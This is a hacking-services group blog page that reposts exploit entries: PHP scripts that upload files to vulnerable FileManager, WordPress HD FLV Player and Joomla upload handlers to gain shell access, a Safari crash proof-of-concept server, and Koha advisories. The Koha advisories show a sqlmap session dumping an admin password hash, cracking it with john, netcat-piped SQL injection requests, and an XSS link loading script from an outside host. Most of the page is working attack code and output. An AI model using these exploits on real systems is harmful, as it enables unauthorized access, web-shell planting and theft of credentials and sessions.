Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863548395

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/53945/info

FileManager is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

nj3ct0rK3d-Sh3lL#";
$uploadfile = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($uploadfile != "exit")
{
$ch = curl_init("http://www.example.com/modules/fileManager/xupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'path'=>'img'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
}
else break;
?>
HireHackking 
source: https://www.securityfocus.com/bid/53967/info

HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

HD FLV Player 1.7 is vulnerable; other versions may also be affected. 

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.jpg";
$ch = 
curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('myfile'=>"@$uploadfile",
                'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : 
http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg
Filename : [CTRL-u] PostShell.php after executed

lo.php.jpg
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/53968/info

The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Simple SWFUpload 2.0 is vulnerable;other versions may also be affected. 

<?php

$uploadfile="lo.php.gif";

$ch = 
curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/images/stories/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/53969/info

The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Art Uploader 1.0.1 is vulnerable; other versions may also be affected. 

<?php

$uploadfile="lo.php";
$ch = 
curl_init("http://www.example.com/modules/mod_artuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('userfile'=>"@$uploadfile",
                'path'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.example.com/modules/mod_artuploader/lo.php

lo.php
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/53972/info

The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

DentroVideo 1.2 is vulnerable; other versions may also be affected.

Exploit 1 :

PostShell.php

<?php

$uploadfile="lo.php";

$ch = 
curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('file1'=>"@$uploadfile",
                'action'=>'upload'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.example.com/lo.php

lo.php
<?php
phpinfo();
?>


Exploit 2 :

PostShell2.php

<?php

$uploadfile="lo.php.mpg3";

$ch = 
curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3

lo.php.mpg3
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/53973/info

The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.

IDoEditor 1.6.16 is vulnerable; other versions may also be affected. 

<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/53975/info

The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

jFancy 2.03 is vulnerable; other versions may also be affected. 

Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif";
$ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.example.com/images/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/53977/info

The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.

Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected. 

<?php

$uploadfile="lo.php";

$ch = 
curl_init("http://www.example.com/plugins/content/efup_files/helper.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile",
                'JPATH_BASE'=>'../../../',
                'filesize'=>'2000',
                'filetypes'=>'*.*',
                'mimetypes'=>"*",
                'destination'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
HireHackking 
#!/usr/bin/php
<?php
# Title          :  Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of 
Concept
# Product Website:  https://www.apple.com/safari/
# Author         :  Mohammad Reza Espargham
# Linkedin       :  https://ir.linkedin.com/in/rezasp
# E-Mail         :  me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website        :  www.reza.es
# Twitter        :  https://twitter.com/rezesp
# FaceBook       :  https://www.facebook.com/mohammadreza.espargham



# Usage :
# php poc.php
# Open Safari and open ip:8080 / 127.0.0.1:8080
# Crashed ;)

#Main POC Code
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create 
socket!');
socket_bind($reza, 0,8080);
socket_listen($reza);
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
$msg = 
'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd=base64_decode($msg);
for (;;) {
         if ($client = @socket_accept($reza)) {
             socket_write($client, "HTTP/1.1 200 OK\r\n" .
             "Content-length: " . strlen($msgd) . "\r\n" .
             "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
             $msgd);
         }
         else usleep(100000);
}





#Crash Report
/*

Process Model:
Multiple Web Processes


Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib        	0x00007fff8e628286 __pthread_kill + 
10
1   libsystem_c.dylib             	0x00007fff90619b53 abort + 129
2   libsystem_c.dylib             	0x00007fff905e1c39 __assert_rtn + 321
3   com.apple.CoreGraphics        	0x00007fff87716e4e 
CGPathCreateMutableCopyByTransformingPath + 242
4   com.apple.CoreGraphics        	0x00007fff8773aff0 CGContextAddPath + 
93
5   com.apple.WebCore             	0x0000000104ea8c84 
WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6   com.apple.WebCore             	0x000000010597e851 
WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, 
WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, 
WebCore::RenderSVGShape const*) + 65
7   com.apple.WebCore             	0x000000010597f08a 
WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, 
WebCore::GraphicsContext*) + 122
8   com.apple.WebCore             	0x000000010597f3c3 
WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9   com.apple.WebCore             	0x0000000104fa73cb 
WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 379
10  com.apple.WebCore             	0x0000000104fa7062 
WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 1330
11  com.apple.WebCore             	0x0000000104f1ee72 
WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 722
12  com.apple.WebCore             	0x0000000105429e88 
WebCore::InlineElementBox::paint(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 
312
13  com.apple.WebCore             	0x0000000104ea4a63 
WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14  com.apple.WebCore             	0x0000000104ea4509 
WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15  com.apple.WebCore             	0x0000000104e53d96 
WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, 
WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16  com.apple.WebCore             	0x0000000104e51373 
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 67
17  com.apple.WebCore             	0x0000000104e50724 
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 420
18  com.apple.WebCore             	0x0000000104e529af 
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 287
19  com.apple.WebCore             	0x00000001058db139 
WebCore::RenderBlock::paintChild(WebCore::RenderBox&, 
WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, 
bool) + 393
20  com.apple.WebCore             	0x0000000104e51478 
WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21  com.apple.WebCore             	0x0000000104e51420 
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 240
22  com.apple.WebCore             	0x0000000104e50724 
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, 
WebCore::LayoutPoint const&) + 420
23  com.apple.WebCore             	0x0000000104e529af 
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint 
const&) + 287
24  com.apple.WebCore             	0x0000000104e512b2 
WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, 
WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, 
WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo 
const&, unsigned int, WebCore::RenderObject*) + 370
25  com.apple.WebCore             	0x0000000104e50f87 
WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 
1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, 
WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, 
WebCore::RenderObject*, bool, bool) + 423
26  com.apple.WebCore             	0x0000000104e4fc30 
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
27  com.apple.WebCore             	0x0000000104e4f002 
WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28  com.apple.WebCore             	0x0000000104e4fd62 
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, 
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29  com.apple.WebCore             	0x0000000104e7ac36 
WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer 
const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned 
int, unsigned int) + 358
30  com.apple.WebCore             	0x000000010593757f 
WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer 
const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect 
const&) + 799
31  com.apple.WebCore             	0x000000010537dd44 
WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, 
WebCore::FloatRect const&) + 132
32  com.apple.WebCore             	0x00000001058b6ad9 
WebCore::PlatformCALayer::drawLayerContents(CGContext*, 
WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, 
WTF::CrashOnOverflow>&) + 361
33  com.apple.WebCore             	0x0000000105b170a7 
WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, 
WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34  com.apple.WebCore             	0x0000000105ba36cc -[WebSimpleLayer 
drawInContext:] + 172
35  com.apple.QuartzCore          	0x00007fff8d7033c7 
CABackingStoreUpdate_ + 3306
36  com.apple.QuartzCore          	0x00007fff8d7026d7 
___ZN2CA5Layer8display_Ev_block_invoke + 59
37  com.apple.QuartzCore          	0x00007fff8d702694 
x_blame_allocations + 81
38  com.apple.QuartzCore          	0x00007fff8d6f643c 
CA::Layer::display_() + 1546
39  com.apple.WebCore             	0x0000000105ba35eb -[WebSimpleLayer 
display] + 43
40  com.apple.QuartzCore          	0x00007fff8d6f47fd 
CA::Layer::display_if_needed(CA::Transaction*) + 603
41  com.apple.QuartzCore          	0x00007fff8d6f3e81 
CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42  com.apple.QuartzCore          	0x00007fff8d6f3612 
CA::Context::commit_transaction(CA::Transaction*) + 242
43  com.apple.QuartzCore          	0x00007fff8d6f33ae 
CA::Transaction::commit() + 390
44  com.apple.QuartzCore          	0x00007fff8d701f19 
CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, 
void*) + 71
45  com.apple.CoreFoundation      	0x00007fff869f7127 
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46  com.apple.CoreFoundation      	0x00007fff869f7080 
__CFRunLoopDoObservers + 368
47  com.apple.CoreFoundation      	0x00007fff869e8bf8 
CFRunLoopRunSpecific + 328
48  com.apple.HIToolbox           	0x00007fff8df1156f 
RunCurrentEventLoopInMode + 235
49  com.apple.HIToolbox           	0x00007fff8df112ea 
ReceiveNextEventCommon + 431
50  com.apple.HIToolbox           	0x00007fff8df1112b 
_BlockUntilNextEventMatchingListInModeWithFilter + 71
51  com.apple.AppKit              	0x00007fff8ebe59bb _DPSNextEvent + 
978
52  com.apple.AppKit              	0x00007fff8ebe4f68 -[NSApplication 
nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53  com.apple.AppKit              	0x00007fff8ebdabf3 -[NSApplication 
run] + 594
54  com.apple.AppKit              	0x00007fff8eb57354 NSApplicationMain 
+ 1832
55  libxpc.dylib                  	0x00007fff8ab77958 _xpc_objc_main + 
793
56  libxpc.dylib                  	0x00007fff8ab79060 xpc_main + 490
57  com.apple.WebKit.WebContent   	0x0000000103f10b40 0x103f10000 + 2880
58  libdyld.dylib                 	0x00007fff873e45c9 start + 1
*/
?>
HireHackking 
# Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4633




### CVE-2015-4633 ### 

#### Titel: ####
Unauthenticated SQL Injection in Koha

#### Type of vulnerability: ####
An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database. 

##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access the filesystem may be possible.

#### Impact: ####
critical

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, 
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4633

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.

#### Proof-of-concept: ####
1. Inspect Koha database schema

   Have a look at how to query the database for superlibrarian users:
   http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

   So basically we we need to execute some SQL statement like this:
   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

2. Query the database with sqlmap

   So let's fire up sqlmap with the --sql-shell parameter and input the query:

   root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
         _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
   |_ -| . | |     | .'| . |
   |___|_  |_|_|_|_|__,|  _|
         |_|           |_|   http://sqlmap.org

   [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

   [*] starting at 09:20:07

   [09:20:07] [INFO] testing connection to the target URL
   sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
   ---
   Parameter: number (GET)
       Type: AND/OR time-based blind
       Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
       Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
   ---
   [09:20:09] [INFO] testing MySQL
   [09:20:09] [INFO] confirming MySQL
   [09:20:09] [INFO] the back-end DBMS is MySQL
   web server operating system: Linux Debian
   web application technology: Apache 2.4.10
   back-end DBMS: MySQL >= 5.0.0
   [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
   [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
   [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
   [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                      
   [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
   admin
   [09:21:46] [INFO] retrieved: $2a$08$taQ
   [09:23:33] [ERROR] invalid character detected. retrying..
   [09:23:33] [WARNING] increasing time delay to 5 seconds 
   afOgEEhU
   [09:25:10] [ERROR] invalid character detected. retrying..
   [09:25:10] [WARNING] increasing time delay to 6 seconds 
   t/gW
   [09:26:13] [ERROR] invalid character detected. retrying..
   [09:26:13] [WARNING] increasing time delay to 7 seconds 
   TOmqnYe1Y6ZNxCENa
   [09:29:57] [ERROR] invalid character detected. retrying..
   [09:29:57] [WARNING] increasing time delay to 8 seconds 
   2.ONk2eZhnuEw5z9OjjxS
   [09:35:08] [ERROR] invalid character detected. retrying..
   [09:35:08] [WARNING] increasing time delay to 9 seconds 

   select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    
   'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

3. Feed john the ripper and be lucky

   root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
   root@kali:/home/wicked# john ./admin-pass 
   Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
   admin            (?)
   guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
   Use the "--show" option to display all of the cracked passwords reliably

   root@kali:/home/wicked# john ./admin-pass --show
   ?:admin

   1 password hash cracked, 0 left


4. Log in with username "admin" and password "admin" ;)










### CVE-2015-xxxx ### 

#### Titel: ####
Unauthenticated SQL Injection

#### Type of vulnerability: ####
SQL Injection vulnerabilities in Koha staff client allows attackers to read arbitrary data from the database. 

##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem is possible.

#### Impact: ####
critical

#### Software/Product name: ####
Koha

#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, 
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-xxxx

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.

#### Proof-of-concept: ####
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
HireHackking 
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
# Google Dork:
# Date: 25/06/2015
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
# Vendor Homepage: koha-community.org
# Software Link: https://github.com/Koha-Community/Koha
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
# Tested on: Debian Linux
# CVE : CVE-2015-4630, CVE-2015-4631


### CVE-2015-4631 ### 

#### Titel: ####
Multiple XSS and XSRF vulnerabilities in Koha 

#### Type of vulnerability: ####
Koha suffers from multiple critical XSS and XSRF vulnerabilities

##### Exploitation vector:
The attack can be performed through a compromised user account (for example previous password retrieval if student user acoount through SQLI - CVE-2015-4633) or due to user that clicks on a malicious link (for example in a phishing mail, forum link etc)

##### Attack outcome:
1. An attacker may escalate privileges and even gain superlibrarian permissions.
2. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines.
3. Perform unauthorized actions with the permissions of a staff member
4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the websever

#### Impact: ####
{low,medium,high,critical}
critical

#### Software/Product name: ####
Koha
 
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8 
* <= Koha 3.16.12

#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/, 
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/

#### Vendor: ####
http://koha-community.org/ (Open Source)

#### CVE number: ####
CVE-2015-4631

#### Timeline ####
* `2015-06-18` identification of vulnerability 
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities

#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org

#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/

#### Description: ####
Koha suffers from various critical XSS and XSRF vulnerabilities due to imprope input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks. This allows remote remote attackers to inject arbitrary web script or HTML and completely compromise the webpage. 

The following pages are affected from stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected from relfective XSS flaws:

/cgi-bin/koha/opac-shelves.pl 				(parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl 				(parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl 		(parameters: "value") 
/cgi-bin/koha/acqui/lateorders.pl 			(parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl 	(parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl		(parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl			(parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl			(parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") 
/cgi-bin/koha/suggestion/suggestion.pl 			(parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")

#### Proof-of-concept: ####
Attack scenario:

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

